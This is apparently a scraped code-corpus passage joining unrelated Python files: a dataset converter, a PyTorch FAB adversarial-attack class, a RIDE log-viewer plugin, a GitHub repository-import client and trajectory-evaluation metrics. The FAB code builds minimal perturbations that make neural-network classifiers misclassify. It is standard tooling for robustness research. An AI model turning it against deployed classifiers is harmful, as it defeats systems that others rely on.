            if tmpl_value in src_envs and len(src_envs[tmpl_value]) > 0:
                f.write(tmpl_key + ": \"" + src_envs[tmpl_value] + '"\n')
    return True
| StarcoderdataPython |
4808108 | <gh_stars>100-1000
import argparse
import jsonlines
# Map a claims dataset to abstract-retrieval format: for each claim emit the
# doc ids that carry evidence (optionally falling back to the first cited doc
# for NOT-ENOUGH-INFO claims when --include-nei is set).
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type=str, required=True)
parser.add_argument('--include-nei', action='store_true')
parser.add_argument('--output', type=str, required=True)
args = parser.parse_args()
dataset = jsonlines.open(args.dataset)
output = jsonlines.open(args.output, 'w')
for data in dataset:
    # Evidence is keyed by doc id (as strings); convert to ints.
    doc_ids = list(map(int, data['evidence'].keys()))
    # NEI claims have no evidence; optionally use the first cited doc instead.
    if not doc_ids and args.include_nei:
        doc_ids = [data['cited_doc_ids'][0]]
    output.write({
        'claim_id': data['id'],
        'doc_ids': doc_ids
    })
| StarcoderdataPython |
1605846 | from spanet.network.jet_reconstruction import JetReconstructionModel
| StarcoderdataPython |
3282402 | <filename>autoattack/fab_pt.py
# Copyright (c) 2019-present, <NAME>
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
import torch
from autoattack.other_utils import zero_gradients
from autoattack.fab_base import FABAttack
class FABAttack_PT(FABAttack):
    """
    Fast Adaptive Boundary Attack (Linf, L2, L1)
    https://arxiv.org/abs/1907.02044
    :param predict: forward pass function
    :param norm: Lp-norm to minimize ('Linf', 'L2', 'L1' supported)
    :param n_restarts: number of random restarts
    :param n_iter: number of iterations
    :param eps: epsilon for the random restarts
    :param alpha_max: alpha_max
    :param eta: overshooting
    :param beta: backward step
    """
    def __init__(
            self,
            predict,
            norm='Linf',
            n_restarts=1,
            n_iter=100,
            eps=None,
            alpha_max=0.1,
            eta=1.05,
            beta=0.9,
            loss_fn=None,
            verbose=False,
            seed=0,
            targeted=False,
            device=None,
            n_target_classes=9):
        """ FAB-attack implementation in pytorch """
        self.predict = predict
        super().__init__(norm,
                         n_restarts,
                         n_iter,
                         eps,
                         alpha_max,
                         eta,
                         beta,
                         loss_fn,
                         verbose,
                         seed,
                         targeted,
                         device,
                         n_target_classes)
    def _predict_fn(self, x):
        # Hook used by the base class to run the model forward pass.
        return self.predict(x)
    def _get_predicted_label(self, x):
        # Hard label: argmax over logits, computed without building a graph.
        with torch.no_grad():
            outputs = self._predict_fn(x)
        _, y = torch.max(outputs, dim=1)
        return y
    def get_diff_logits_grads_batch(self, imgs, la):
        # Returns logit differences (df) and their input-gradients (dg)
        # relative to the label class `la`, for every class.
        im = imgs.clone().requires_grad_()
        with torch.enable_grad():
            y = self.predict(im)
        # One backward pass per output class to assemble the full Jacobian;
        # grad_mask selects the class logit, retain_graph keeps the graph alive.
        g2 = torch.zeros([y.shape[-1], *imgs.size()]).to(self.device)
        grad_mask = torch.zeros_like(y)
        for counter in range(y.shape[-1]):
            zero_gradients(im)
            grad_mask[:, counter] = 1.0
            y.backward(grad_mask, retain_graph=True)
            grad_mask[:, counter] = 0.0
            g2[counter] = im.grad.data
        # (classes, batch, ...) -> (batch, classes, ...)
        g2 = torch.transpose(g2, 0, 1).detach()
        #y2 = self.predict(imgs).detach()
        y2 = y.detach()
        df = y2 - y2[torch.arange(imgs.shape[0]), la].unsqueeze(1)
        dg = g2 - g2[torch.arange(imgs.shape[0]), la].unsqueeze(1)
        # Exclude the true class from the minimum search downstream.
        df[torch.arange(imgs.shape[0]), la] = 1e10
        return df, dg
    def get_diff_logits_grads_batch_targeted(self, imgs, la, la_target):
        # Targeted variant: a single backward pass for the (target - label)
        # logit difference summed over the batch.
        u = torch.arange(imgs.shape[0])
        im = imgs.clone().requires_grad_()
        with torch.enable_grad():
            y = self.predict(im)
            diffy = -(y[u, la] - y[u, la_target])
            sumdiffy = diffy.sum()
            zero_gradients(im)
            sumdiffy.backward()
        graddiffy = im.grad.data
        df = diffy.detach().unsqueeze(1)
        dg = graddiffy.unsqueeze(1)
        return df, dg
| StarcoderdataPython |
3350202 | # Copyright 2019- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import wx
import os
import tempfile
import uuid
import atexit
import glob
import sys
import io
from robotide.pluginapi import Plugin, ActionInfo, RideParserLogMessage
from robotide import widgets
from robotide import context
def _message_to_string(msg):
    """Render a log record as 'timestamp [LEVEL]: message' followed by a blank line.

    Tab-indented continuation lines ('\\n\\t') are joined into the message body.
    """
    body = msg.message.replace('\n\t', '')
    return '%s [%s]: %s\n\n' % (msg.timestamp, msg.level, body)
class ParserLogPlugin(Plugin):
    """Viewer for internal log messages.

    Collects RideParserLogMessage events, mirrors them to the console and/or a
    per-session temp file (settings), and shows them in a notebook tab.
    """
    def __init__(self, app):
        Plugin.__init__(self, app, default_settings={
            'log_to_console': False,
            'log_to_file': True
        })
        self._log = []
        self._panel = None
        # Unique per-session log file in the system temp directory.
        self._path = os.path.join(
            tempfile.gettempdir(), '{}-ride_parser.log'.format(uuid.uuid4()))
        self._outfile = None
        self._remove_old_log_files()
        atexit.register(self._close)
    def _close(self):
        # Close the lazily-opened log file on interpreter exit.
        if self._outfile is not None:
            self._outfile.close()
    def _remove_old_log_files(self):
        # Best-effort cleanup of log files left behind by previous sessions.
        for fname in glob.glob(
                os.path.join(tempfile.gettempdir(), '*-ride_parser.log')):
            try:
                os.remove(fname)
            # Bug fix: "except OSError or IOError" evaluates the boolean
            # expression first and caught only OSError; use a tuple instead.
            except (OSError, IOError) as e:
                sys.stderr.write("{}".format(e))
    @property
    def _logfile(self):
        # Lazily open the log file on first write.
        if self._outfile is None:
            self._outfile = io.open(self._path, 'w', encoding='utf8')
        return self._outfile
    def enable(self):
        self._create_menu()
        self.subscribe(self._log_message, RideParserLogMessage)
    def disable(self):
        self.unsubscribe_all()
        self.unregister_actions()
        if self._panel:
            self._panel.close(self.notebook)
    def _create_menu(self):
        self.unregister_actions()
        self.register_action(ActionInfo(
            'Tools', 'View Parser Log', self.OnViewLog, position=83))
    def _log_message(self, log_event):
        """Record a parser log event and fan it out to console/file/UI."""
        self._log.append(log_event)
        if self._panel:
            self._panel.update_log()
        if self.log_to_console:
            # Bug fix: previously printed "".format(...), which always wrote an
            # empty line instead of the formatted message.
            print(_message_to_string(log_event))
        if self.log_to_file:
            self._logfile.write(_message_to_string(log_event))
            self._outfile.flush()
        if log_event.notify_user:
            font_size = 13 if context.IS_MAC else -1
            widgets.HtmlDialog(log_event.level, log_event.message,
                               padding=10, font_size=font_size).Show()
            self.OnViewLog(log_event, show_tab=False)
    def OnViewLog(self, event, show_tab=True):
        # Create the log tab on first use; orange title marks new content.
        if not self._panel:
            self._panel = _LogWindow(self.notebook, self._log)
            self.notebook.SetPageTextColour(self.notebook.GetPageCount()-1, wx.Colour(255, 165, 0))
            self._panel.update_log()
            self.register_shortcut('CtrlCmd-C', lambda e: self._panel.Copy())
        if show_tab:
            self.notebook.show_tab(self._panel)
class _LogWindow(wx.Panel):
    """Read-only notebook tab that displays the accumulated parser log."""
    def __init__(self, notebook, log):
        wx.Panel.__init__(self, notebook)
        self._output = wx.TextCtrl(self, style=wx.TE_READONLY | wx.TE_MULTILINE)
        self._output.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
        self._log = log
        self._notebook = notebook
        self._add_to_notebook(notebook)
        self.SetFont(widgets.Font().fixed_log)
        self.Bind(wx.EVT_SIZE, self.OnSize)
    def _add_to_notebook(self, notebook):
        notebook.add_tab(self, 'Parser Log', allow_closing=True)
        self._output.SetSize(self.Size)
    def close(self, notebook):
        notebook.delete_tab(self)
    def _create_ui(self):
        # NOTE(review): not called anywhere in this file; kept for API parity.
        self.SetSizer(widgets.VerticalSizer())
        self.Sizer.add_expanding(self._output)
    def update_log(self):
        # Re-render the whole log into the text control.
        self._output.SetValue(self._decode_log(self._log))
    def _decode_log(self, log):
        # Concatenate all log records into one display string.
        result = ''
        for msg in log:
            result += _message_to_string(msg)
        return result
    def OnSize(self, evt):
        # Keep the text control filling the panel on resize.
        self._output.SetSize(self.Size)
    def OnKeyDown(self, event):
        # Ctrl+A selects all; other keys are handled normally.
        keycode = event.GetKeyCode()
        if event.ControlDown() and keycode == ord('A'):
            self.SelectAll()
        else:
            event.Skip()
    def Copy(self):
        # No-op: copying is handled natively by the read-only TextCtrl.
        pass
    def SelectAll(self):
        self._output.SetSelection(-1, -1)
| StarcoderdataPython |
1687002 | import requests
from .config import config_value
class Github:
    """Minimal GitHub REST v3 client used for GitLab -> GitHub migration.

    All methods return None on an unexpected HTTP status.
    """
    def __init__(self):
        # Credentials and identity come from the local config file.
        self.token = config_value('github', 'token')
        self.user = config_value('github', 'user')
        self.email = config_value('github', 'email')
        self.name = config_value('github', 'name')
    # https://docs.github.com/en/rest/reference/repos#list-repositories-for-the-authenticated-user
    def repositories(self):
        """Return {repo_name: clone_url} for repos owned by the user, or None."""
        url = 'https://api.github.com/user/repos'
        params = {
            'accept': 'application/vnd.github.v3+json',
            'affiliation': 'owner'
        }
        response = requests.get(url=url, params=params, auth=(self.email, self.token))
        if (response.status_code != 200):
            return None
        data = response.json()
        repos = dict()
        for repo in data:
            repos[repo['name']] = repo['clone_url']
        return repos
    # https://docs.github.com/en/rest/reference/repos#create-a-repository-for-the-authenticated-user
    def repositoryCreate(self, name, description):
        """Create a private repository and return its clone URL, or None."""
        url = 'https://api.github.com/user/repos'
        params = {
            'accept': 'application/vnd.github.v3+json',
        }
        json = {
            'name': name,
            'description': description,
            'private': True
        }
        response = requests.post(url=url, params=params, auth=(self.email, self.token), json=json)
        if (response.status_code != 201):
            return None
        return response.json()['clone_url']
    # https://docs.github.com/en/rest/reference/migrations#start-an-import
    def importStart(self, gitlabRepoUrl, githubRepoName):
        """Start importing a GitLab repo into the named GitHub repo."""
        url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import'
        params = {
            'accept': 'application/vnd.github.v3+json',
            'Content-Type': 'application/json'
        }
        json = {
            'vcs_url': gitlabRepoUrl,
            'vcs': 'git',
            'vcs_username': config_value('gitlab', 'email'),
            'vcs_password': config_value('gitlab', 'token')
        }
        response = requests.put(url=url, params=params, auth=(self.email, self.token), json=json)
        if (response.status_code != 201):
            return None
        return response.json()
    # https://docs.github.com/en/rest/reference/migrations#get-an-import-status
    def importStatus(self, githubRepoName):
        """Return the current import status string, or None."""
        url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import'
        params = {
            'accept': 'application/vnd.github.v3+json'
        }
        response = requests.get(url=url, params=params, auth=(self.email, self.token))
        if (response.status_code != 200):
            return None
        return response.json()['status']
    # https://docs.github.com/en/rest/reference/migrations#cancel-an-import
    def importCancel(self, githubRepoName):
        """Cancel a running import; return True on success, None otherwise."""
        url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import'
        params = {
            'accept': 'application/vnd.github.v3+json'
        }
        response = requests.delete(url=url, params=params, auth=(self.email, self.token))
        if (response.status_code != 204):
            return None
        return True
    # https://docs.github.com/en/rest/reference/migrations#get-commit-authors
    def getCommitAuthors(self, githubRepoName):
        """Return the list of commit-author ids found during import, or None."""
        url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import/authors'
        params = {
            'accept': 'application/vnd.github.v3+json'
        }
        response = requests.get(url=url, params=params, auth=(self.email, self.token))
        if (response.status_code != 200):
            return None
        data = response.json()
        # Bug fix: removed leftover debug `print(data)` that spammed stdout.
        authors = list()
        for author in data:
            authors.append(author['id'])
        return authors
    # https://docs.github.com/en/rest/reference/migrations#map-a-commit-author
    def mapAuthor(self, githubRepoName, authorId):
        """Remap an imported commit author to the configured name/email."""
        url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import/authors/{authorId}'
        params = {
            'accept': 'application/vnd.github.v3+json'
        }
        json = {
            'email': self.email,
            'name': self.name
        }
        response = requests.patch(url=url, params=params, auth=(self.email, self.token), json=json)
        if (response.status_code != 200):
            return None
        return response.json()
    # https://docs.github.com/en/rest/reference/migrations#get-large-files
    def getLargeFiles(self, githubRepoName):
        """Return the list of large files detected by the import, or None."""
        url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import/large_files'
        params = {
            'accept': 'application/vnd.github.v3+json'
        }
        response = requests.get(url=url, params=params, auth=(self.email, self.token))
        if (response.status_code != 200):
            return None
        return response.json()
    # https://docs.github.com/en/rest/reference/migrations#update-git-lfs-preference
    def lfsPreference(self, githubRepoName):
        """Opt the import into Git LFS for large files."""
        url = f'https://api.github.com/repos/{self.user}/{githubRepoName}/import/lfs'
        params = {
            'accept': 'application/vnd.github.v3+json'
        }
        json = {
            'use_lfs': 'opt_in'
        }
        response = requests.patch(url=url, params=params, auth=(self.email, self.token), json=json)
        if (response.status_code != 200):
            return None
        return response.json()
| StarcoderdataPython |
1663751 | <reponame>elbuco1/AttentionMechanismsTrajectoryPrediction<filename>src/models/helpers/helpers_evaluation.py
from sklearn.preprocessing import OneHotEncoder
from scipy.spatial import distance_matrix,distance
from scipy.stats import norm
from scipy.spatial.distance import euclidean
from scipy.stats import wasserstein_distance
import matplotlib.image as mpimg
import cv2
import copy
import time
import json
import torch
import sys
import helpers.helpers_training as helpers
import torch.nn as nn
import numpy as np
import os
import ot
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from datasets.datasets import Hdf5Dataset,CustomDataLoader
from pyemd import emd_samples
import scipy
# from classes.evaluation import Evaluation
def ade(outputs, targets, mask=None):
    """Average Displacement Error.

    Mean Euclidean distance between predicted and ground-truth points,
    restricted to mask-valid entries; mask.sum()/2 counts valid 2D points.
    A missing mask means every point is valid.
    """
    if mask is None:
        mask = np.ones_like(targets)
    masked_out = outputs * mask
    masked_tgt = targets * mask
    sq_diff = (masked_out - masked_tgt) ** 2
    dists = np.sqrt(sq_diff.sum(-1))
    return dists.sum() / (mask.sum() / 2)
def fde(outputs, targets, mask):
    """Final Displacement Error.

    Euclidean distance at each agent's last mask-valid timestep (falling back
    to the final timestep when the mask is full or empty), averaged over agents.
    2D single-agent inputs are promoted to batched 3D form.
    """
    if len(targets.shape) < 3:
        outputs = np.expand_dims(outputs, 0)
        targets = np.expand_dims(targets, 0)
        mask = np.expand_dims(mask, 0)
    if mask is None:
        mask = np.ones_like(targets)
    outputs = outputs * mask
    targets = targets * mask
    # Number of valid timesteps per agent.
    valid_len = (mask.sum(-1) > 0).sum(-1)
    last_out, last_tgt, last_msk = [], [], []
    for seq_o, seq_t, seq_m, k in zip(outputs, targets, mask, valid_len):
        idx = -1 if (k == 0 or k == len(seq_t)) else k - 1
        last_out.append(seq_o[idx])
        last_tgt.append(seq_t[idx])
        last_msk.append(seq_m[idx])
    last_out = np.array(last_out)
    last_tgt = np.array(last_tgt)
    last_msk = np.array(last_msk)
    dists = np.sqrt(((last_out - last_tgt) ** 2).sum(-1))
    return dists.sum() / (last_msk.sum() / 2.0)
# i = i.detach().cpu().numpy()
def revert_scaling_evaluation(offsets_input,scalers_path,i):
    """Undo train-time scaling on trajectory array *i* using the parameters
    stored in the JSON file at *scalers_path*.

    offsets_input selects z-score standardization (offset inputs) vs
    min-max normalization (absolute coordinates). Mutates *i* in the
    standardization branch; returns the unscaled array.
    """
    scaler = json.load(open(scalers_path))
    if offsets_input:
        meanx = scaler["standardization"]["meanx"]
        meany = scaler["standardization"]["meany"]
        stdx = scaler["standardization"]["stdx"]
        stdy = scaler["standardization"]["stdy"]
        # per-axis inverse z-score
        i[:,:,0] = helpers.revert_standardization(i[:,:,0],meanx,stdx)
        i[:,:,1] = helpers.revert_standardization(i[:,:,1],meany,stdy)
    else:
        min_ = scaler["normalization"]["min"]
        max_ = scaler["normalization"]["max"]
        i = helpers.revert_min_max_scale(i,min_,max_)
    return i
# i = torch.FloatTensor(i).to(device)
def types_ohe(types,nb_types):
    """One-hot encode agent type ids with values in 1..nb_types.

    :param types: array of shape (b, n) of integer type ids
    :param nb_types: number of distinct types
    :return: array of shape (b, n, nb_types)
    """
    # Fit the encoder on the full category range so every type gets a column.
    cat = np.arange(1,nb_types+1).reshape(nb_types,1)
    ohe = OneHotEncoder(sparse = False,categories = "auto")
    ohe = ohe.fit(cat)
    b,n = types.shape
    # types = types - 1
    types = ohe.transform(types.reshape(b*n,-1))
    types = types.reshape(b,n,nb_types)
    return types
def get_active_mask(mask_target):
    """For each batch element, return a LongTensor of agent indices whose
    target mask contains at least one valid (non-zero) value.

    :param mask_target: array of shape (b, n, ...) of mask values
    :return: list of b LongTensors of active agent indices
    """
    flat = mask_target.reshape(list(mask_target.shape[:2]) + [-1])
    has_points = (flat.sum(axis=2) > 0).astype(int)
    return [torch.LongTensor(np.flatnonzero(row)) for row in has_points]
def get_data_loader(parameters_project,data_file,scene,args_net,prepare_param,eval_params):
    """Build an evaluation CustomDataLoader over one scene of the HDF5 dataset.

    Dataset options (offsets, padding, images, CNN freezing) are taken from the
    network/prepare/eval parameter dicts.
    """
    # froze_cnn defaults to 0 for configs that predate the option.
    froze_cnn = 0
    if "froze_cnn" in args_net:
        froze_cnn = args_net["froze_cnn"]
    dataset = Hdf5Dataset(
        hdf5_file= data_file,
        scene_list= [scene],
        t_obs=prepare_param["t_obs"],
        t_pred=prepare_param["t_pred"],
        set_type = eval_params["set_type_test"],
        data_type = "trajectories",
        use_neighbors = 1,
        use_masks = 1,
        predict_offsets = args_net["offsets"],
        offsets_input = args_net["offsets_input"],
        padding = prepare_param["padding"],
        evaluation = 1,
        use_images = args_net["use_images"],
        images_path = parameters_project["raw_images"],
        froze_cnn = froze_cnn
    )
    # Evaluation loader: deterministic order, keep the last partial batch.
    data_loader = CustomDataLoader( batch_size = eval_params["batch_size"],shuffle = False,drop_last = False,dataset = dataset,test=0)
    return data_loader
return data_loader
def get_speed(point1, point2, deltat):
    """Speed between two points traversed in *deltat* time units."""
    return distance.euclidean(point1, point2) / deltat
def get_speeds(coordinates, framerate):
    """Consecutive-point speeds along a trajectory sampled every *framerate* time units."""
    return [distance.euclidean(a, b) / framerate
            for a, b in zip(coordinates[:-1], coordinates[1:])]
def get_acceleration(v1, v2, deltat):
    """Acceleration given two speeds *deltat* time units apart."""
    return (v2 - v1) / deltat
def get_accelerations(speeds, framerate):
    """Consecutive accelerations from a list of speeds sampled every *framerate* time units."""
    return [(b - a) / framerate for a, b in zip(speeds[:-1], speeds[1:])]
def scene_mask(scene,img_path,annotations_path,spatial_profiles):
    """Build binary occupancy masks for each spatial profile of a scene.

    Polygons from the scene's JSON annotation file are rasterized onto
    image-sized masks (one per profile); masks are returned ordered by the
    profile ids in *spatial_profiles*.
    """
    img = mpimg.imread(img_path.format(scene))
    masks = []
    masks_ids = []
    for spatial_profile in spatial_profiles:
        # one mask per profile, same resolution as the scene image
        empty_mask = np.zeros_like(img[:,:,0]).astype(np.int32)
        annotations = json.load(open(annotations_path.format(scene)))
        polygons = []
        for object_ in annotations["objects"]:
            if object_["classTitle"] == spatial_profile:
                pts = object_["points"]["exterior"]
                a3 = np.array( [pts] ).astype(np.int32)
                # rasterize the polygon interior as 1s
                cv2.fillPoly( empty_mask, a3, 1 )
        masks.append(empty_mask)
        masks_ids.append(spatial_profiles[spatial_profile])
    # order masks by their profile id
    arg_ids = np.argsort(masks_ids)
    masks = [masks[i] for i in arg_ids]
    return masks
def predict_neighbors_disjoint(inputs,types,active_mask,points_mask,net,device):
    """Predict each agent independently by cyclically permuting the agent axis
    so every agent takes the 'main agent' slot (index 0) once.

    Builds b*n permuted samples, runs the network on all of them, then keeps
    only each permutation's first-agent prediction and reshapes back to
    (b, n, t_pred, 2).
    """
    b,n,s,i = points_mask[0].shape
    b,n,p,i = points_mask[1].shape
    # permute every samples: roll the agent axis so each agent leads once
    batch_perms = []
    batch_p0 = []
    batch_p1 = []
    for batch_element,p0,p1 in zip(inputs,points_mask[0],points_mask[1]):
        batch_element_perms = []
        batch_p0_perms = []
        batch_p1_perms = []
        ids_perm = np.arange(n)
        for ix in range(n):
            ids_perm = np.roll(ids_perm,-ix)
            batch_element_perms.append(batch_element[torch.LongTensor(ids_perm)])
            batch_p0_perms.append(p0[ids_perm])
            batch_p1_perms.append(p1[ids_perm])
        batch_element_perms = torch.stack(batch_element_perms)
        batch_perms.append(batch_element_perms)
        batch_p0_perms = np.array(batch_p0_perms)
        batch_p0.append(batch_p0_perms)
        batch_p1_perms = np.array(batch_p1_perms)
        batch_p1.append(batch_p1_perms)
    # b,n,s,i -> b,n,n,s,i
    batch_perms = torch.stack(batch_perms)
    batch_p0 = np.array(batch_p0)
    batch_p1 = np.array(batch_p1)
    # b,n,n,s,i -> b*n,n,s,i  (flatten permutations into the batch axis)
    batch_perms = batch_perms.view(-1,n,s,i)
    batch_p0 = batch_p0.reshape(-1,n,s,i)
    batch_p1 = batch_p1.reshape(-1,n,p,i)
    # save inputs so the originals can be returned to the caller
    inputs_temp = inputs
    points_mask_temp = points_mask
    active_mask_temp = active_mask
    # new inputs from permutations; every permuted sample is active
    inputs = batch_perms
    points_mask = (batch_p0,batch_p1)
    active_mask = torch.arange(inputs.size()[0]*inputs.size()[1]).to(device)
    # prediction
    outputs = net((inputs,types,active_mask,points_mask))
    # reset inputs
    inputs = inputs_temp
    points_mask = points_mask_temp
    active_mask = active_mask_temp
    # select outputs: keep only the leading agent of each permutation
    outputs = outputs[:,0]
    outputs = outputs.view(b,n,p,i)
    return outputs,inputs,types,active_mask,points_mask
def predict_naive(inputs,types,active_mask,points_mask,net,device,imgs):
    """Predict each agent in isolation: flatten (b, n) agents into b*n
    single-agent samples, run the network, then restore the (b, n) layout.

    NOTE(review): mutates the passed-in points_mask sequence in place, so the
    caller must pass a list (not a tuple) and receives reshaped masks back.
    """
    b,n,s,i = points_mask[0].shape
    b,n,p,i = points_mask[1].shape
    # types = types[active_mask]
    # (b, n, s, i) -> (b*n, 1, s, i): one pseudo-sample per agent
    inputs = inputs.view(-1,s,i).unsqueeze(1)
    # replicate the scene image for every pseudo-sample
    imgs = imgs.repeat(inputs.size()[0],1,1,1)
    types = types.view(-1).unsqueeze(1)
    points_mask[0] = np.expand_dims(points_mask[0].reshape(-1,s,i),1)
    points_mask[1] = np.expand_dims(points_mask[1].reshape(-1,p,i),1)
    # prediction
    outputs = net((inputs,types,active_mask,points_mask,imgs))
    # b*n,s,i -> b,n,s,i  (restore the batch/agent layout)
    outputs = outputs.squeeze(1).view(b,n,p,i)
    inputs = inputs.squeeze(1).view(b,n,s,i)
    types = types.squeeze(1).view(b,n)
    points_mask[0] = points_mask[0].squeeze(1).reshape(b,n,s,i)
    points_mask[1] = points_mask[1].squeeze(1).reshape(b,n,p,i)
    return outputs,inputs,types,active_mask,points_mask
################ Criterions ###########################
def convert_losses(losses, prefix, losses_in):
    """Merge *losses_in* into *losses*, prefixing every inner loss name.

    Existing entries under the same outer key are preserved; the (mutated)
    *losses* dict is returned.
    """
    for key, inner in losses_in.items():
        dest = losses.setdefault(key, {})
        for name, value in inner.items():
            dest[prefix + name] = value
    return losses
def apply_criterion(criterion,scene_files):
    """Apply a loss criterion to every sample of every scene result file.

    For each sample the criterion is computed 'joint' (all agents) and
    'disjoint' (main agent only, index 0); per-scene and global means
    are returned as {scene: {"joint": m, "disjoint": m}}.
    """
    results = {"global":{"joint":[],"disjoint":[]}}
    for scene_file in scene_files:
        # scene name is encoded in the file name: <scene>_*.json
        scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
        results[scene] = {"joint":[],"disjoint":[]}
        # print(scene)
        scene_file = json.load(open(scene_file))
        for sample in scene_file:
            sample = scene_file[sample]
            labels = np.array(sample["labels"])
            outputs = np.array(sample["outputs"])
            point_mask = np.array(sample["points_mask"])
            # copies protect the stored sample from in-place criterion edits
            loss = criterion(outputs.copy(), labels.copy(),point_mask.copy())
            loss_unjoint = criterion(outputs[0].copy(), labels[0].copy(),point_mask[0].copy())
            results[scene]["joint"].append(loss)
            results[scene]["disjoint"].append(loss_unjoint)
            results["global"]["joint"].append(loss)
            results["global"]["disjoint"].append(loss_unjoint)
        results[scene]["joint"] = np.mean(results[scene]["joint"])
        results[scene]["disjoint"] = np.mean(results[scene]["disjoint"])
    results["global"]["joint"] = np.mean(results["global"]["joint"])
    results["global"]["disjoint"] = np.mean(results["global"]["disjoint"])
    return results
def spatial_distrib(scene_files, use_inputs = 1):
    """Earth Mover's Distance between the spatial distribution of ground-truth
    points (optionally including observed inputs) and predicted points,
    per scene and averaged globally (main agent only)."""
    spatial_conflicts_results = {}
    for scene_file in scene_files:
        scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
        scene_file = json.load(open(scene_file))
        labels = []
        outputs = []
        spatial_conflicts_results[scene] = {}
        for sample in scene_file:
            sample = scene_file[sample]
            # index 0 selects the main agent
            label = sample["labels"][0]
            output = sample["outputs"][0]
            inputs = sample["inputs"][0]
            type_ = sample["types"][0]
            labels += label
            outputs += output
            if use_inputs:
                # also count observed (input) points on the ground-truth side
                labels += inputs
        spatial_conflicts_results[scene]["distance"] = emd_samples(labels,outputs)
    global_ = []
    for scene in spatial_conflicts_results:
        global_.append(spatial_conflicts_results[scene]["distance"])
    spatial_conflicts_results["global"] = {}
    spatial_conflicts_results["global"]["distance"] = np.mean(global_)
    return spatial_conflicts_results
def spatial_hist(scene_files,scenes_dimensions, types_to_spatial, cell_size, use_inputs = 1):
    """Manhattan (L1) distance between normalized 2D occupancy histograms of
    ground-truth and predicted points, per scene and averaged globally.

    Each scene is discretized into cells of *cell_size* meters; histograms are
    normalized to probability distributions before comparison.
    """
    spatial_conflicts_results = {}
    for scene_file in scene_files:
        scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
        spatial_conflicts_results[scene] = 0
        scene_file = json.load(open(scene_file))
        h,w = scenes_dimensions[scene]
        grid_label = get_grid(w,h,cell_size)
        grid_output = get_grid(w,h,cell_size)
        spatial_conflicts_results[scene] = {}
        for sample in scene_file:
            sample = scene_file[sample]
            # index 0 selects the main agent
            label = sample["labels"][0]
            output = sample["outputs"][0]
            inputs = sample["inputs"][0]
            type_ = sample["types"][0]
            for p_label, p_output in zip(label, output):
                grid_label = fill_grid(p_label, grid_label, cell_size)
                grid_output = fill_grid(p_output, grid_output, cell_size)
            if use_inputs:
                # observed points also contribute to the ground-truth histogram
                for p_input in inputs:
                    grid_label = fill_grid(p_input, grid_label, cell_size)
        grid_label = grid_label.flatten()
        grid_output = grid_output.flatten()
        # normalize counts into probability distributions
        grid_label /= grid_label.sum()
        grid_output /= grid_output.sum()
        spatial_conflicts_results[scene]["manhattan"] = scipy.spatial.distance.minkowski(grid_label,grid_output,p=1)
        # print("a {}".format(wasserstein_distance(cell_distrib_label,cell_distrib_output)))
    global_ = []
    for scene in spatial_conflicts_results:
        val = spatial_conflicts_results[scene]["manhattan"]
        global_.append(val)
    spatial_conflicts_results["global"] = {}
    spatial_conflicts_results["global"]["manhattan"] = np.mean(global_)
    return spatial_conflicts_results
def fill_grid(p, grid, cell_size):
    """Increment the occupancy count of the grid cell containing point *p*.

    Points whose cell index falls outside the grid bounds are ignored.
    The grid is modified in place and also returned for convenience.
    """
    row = int(p[0] / cell_size)
    col = int(p[1] / cell_size)
    inside = row < grid.shape[0] and col < grid.shape[1]
    if inside:
        grid[row, col] += 1
    return grid
# def get_grid(h,w,cell_size, meter_margin = 7):
# cell_margin = int(meter_margin/cell_size)
# print(cell_size, cell_margin)
# if int(meter_margin/cell_size) != meter_margin/cell_size:
# cell_margin += 1
# print(cell_margin)
# nh = int(h/cell_size) + 1 + cell_margin
# nw = int(w/cell_size) + 1 + cell_margin
# grid = np.zeros((nh,nw))
# return grid
def get_grid(h, w, cell_size):
    """Return a zeroed occupancy grid covering an ``h`` x ``w`` area.

    Grid shape is one more than the truncated cell count along each axis,
    so the far boundary always has a cell.
    """
    shape = (int(h / cell_size) + 1, int(w / cell_size) + 1)
    return np.zeros(shape)
def get_scene_dimension(pixel_height, pixel_width, pixel_meter_ratio):
    """Convert pixel dimensions to meters using the pixel-to-meter ratio."""
    return pixel_height * pixel_meter_ratio, pixel_width * pixel_meter_ratio
def cut_decimals(a, n=2):
    """Truncate *a* to *n* decimal places (truncation toward zero, not rounding)."""
    factor = 10 ** n
    return int(a * factor) / factor
def get_scene_dimensions(scenes,images,pixel_meter_ratios):
    """Return a dict mapping each scene name to its (height, width) in meters.

    For each scene, loads the scene image (``images`` is a format string with
    one ``{}`` placeholder for the scene name), converts its pixel dimensions
    to meters via the scene's pixel-to-meter ratio, and truncates both values
    to two decimal places.
    """
    dimensions = {}
    for scene in scenes:
        pixel_meter_ratio = pixel_meter_ratios[scene]
        img_path = images.format(scene)
        img = np.array(cv2.imread(img_path))
        # cv2.imread returns (height, width, channels).
        h,w,_ = img.shape
        h,w = get_scene_dimension(h,w,pixel_meter_ratio)
        h = cut_decimals(h)
        w = cut_decimals(w)
        dimensions[scene] = (h,w)
    return dimensions
def spatial(scene_files,types_to_spatial,images,spatial_annotations,spatial_profiles,pixel_meter_ratios):
    """Per-scene rate of main-agent trajectory points landing on spatial masks.

    For each scene, builds per-profile binary masks from the spatial
    annotations, converts label/output trajectories from meters to pixels,
    and counts points of the main agent (index 0) that fall on the mask for
    both groundtruth and predictions. Counts are normalized per point and
    per sample.

    NOTE(review): the normalization divides by ``nb_pt`` taken from the
    *last* sample processed; if samples have differing point counts the
